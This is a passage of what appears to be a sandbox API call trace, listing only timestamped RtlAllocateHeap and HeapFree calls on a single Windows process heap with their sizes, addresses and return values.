hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105340 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105340 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105500 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105500 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105320 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105320 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0036.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105370 [0036.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105370 | out: hHeap=0xe0000) returned 1 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105210 [0036.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105210 | out: hHeap=0xe0000) returned 1 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105500 [0036.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105500 | out: hHeap=0xe0000) returned 1 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1052b0 [0036.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1052b0 | out: hHeap=0xe0000) returned 1 [0036.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106448 | out: hHeap=0xe0000) returned 1 [0036.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105728 | out: hHeap=0xe0000) returned 1 [0036.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105610 | out: hHeap=0xe0000) returned 1 [0036.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105840 | out: hHeap=0xe0000) returned 1 [0036.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103ab8 | out: hHeap=0xe0000) returned 1 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109710 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108ab0 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109440 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1097a0 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1094d0 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109680 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108c60 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1095f0 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108cf0 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108ea0 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109200 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109290 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108d80 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109050 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109830 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109950 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108b40 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1099e0 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108bd0 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108e10 [0036.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108f30 [0036.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108fc0 [0036.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1090e0 [0036.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109170 [0036.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109320 [0036.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1093b0 [0036.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107a70 [0036.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107320 [0036.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107560 [0036.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107b90 [0036.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1078c0 [0036.827] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1077a0 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109710 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109440 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097a0 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1094d0 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109680 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108c60 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095f0 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108cf0 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ea0 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109200 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109290 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108d80 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109050 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109830 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109950 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108b40 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1099e0 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bd0 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108e10 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f30 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108fc0 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1090e0 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109170 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109320 | out: hHeap=0xe0000) returned 1 [0036.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1093b0 | out: hHeap=0xe0000) returned 1 [0036.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107a70 | out: hHeap=0xe0000) returned 1 [0036.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107320 | out: hHeap=0xe0000) returned 1 [0036.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107560 | out: hHeap=0xe0000) returned 1 [0036.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107b90 | out: hHeap=0xe0000) returned 1 [0036.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1078c0 | out: hHeap=0xe0000) returned 1 [0036.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1077a0 | out: hHeap=0xe0000) returned 1 [0036.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098c0 | out: hHeap=0xe0000) returned 1 [0036.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105ed0 | out: hHeap=0xe0000) returned 1 [0036.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0036.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0036.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109560 | out: hHeap=0xe0000) returned 1 [0036.832] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fe8 | out: hHeap=0xe0000) returned 1 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108b40 [0036.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109560 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x105a70 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x105280 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x105840 [0036.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105280 | out: hHeap=0xe0000) returned 1 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x105b88 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x106218 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055c0 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103a58 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108bd0 [0036.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x105958 [0036.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bd0 | out: hHeap=0xe0000) returned 1 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103a70 [0036.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055c0 | out: hHeap=0xe0000) returned 1 [0036.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x1098c0 [0036.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103a70 | out: hHeap=0xe0000) returned 1 [0036.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x105ca0 [0036.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098c0 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1052c0 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1052c0 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1053a0 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1053a0 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105400 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105400 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1052c0 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1052c0 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105300 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105300 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105300 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105300 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1053f0 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1053f0 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105260 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105260 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105230 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105230 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105230 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105230 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105370 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105370 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105330 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105330 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0036.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0036.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105390 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105390 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105340 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105340 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054e0 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054e0 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055b0 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1053e0 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1053e0 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105490 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105490 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1053d0 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1053d0 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105590 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105590 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105240 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105240 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105430 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105430 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105280 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105280 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1052c0 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1052c0 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1053f0 [0036.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1053f0 | out: hHeap=0xe0000) returned 1 [0036.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1052d0 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1052d0 | out: hHeap=0xe0000) returned 1 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1053e0 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1053e0 | out: hHeap=0xe0000) returned 1 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105310 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105310 | out: hHeap=0xe0000) returned 1 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055b0 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055c0 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055c0 | out: hHeap=0xe0000) returned 1 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105300 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105300 | out: hHeap=0xe0000) returned 1 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105b88 | out: hHeap=0xe0000) returned 1 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105958 | out: hHeap=0xe0000) returned 1 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106218 | out: hHeap=0xe0000) returned 1 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105ca0 | out: hHeap=0xe0000) returned 1 [0036.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103a58 | out: hHeap=0xe0000) returned 1 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109290 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108f30 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108ea0 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108c60 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108bd0 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1099e0 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1097a0 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108cf0 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108fc0 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108e10 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109200 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108d80 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109050 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1090e0 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109170 [0036.836] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109440 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109320 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1093b0 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1094d0 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1095f0 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109830 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1098c0 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109680 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109710 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x109950 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x108ab0 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107290 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x107950 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106ab0 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106fc0 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106c60 [0036.837] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1075f0 [0036.840] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109290 | out: hHeap=0xe0000) returned 1 [0036.840] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f30 | 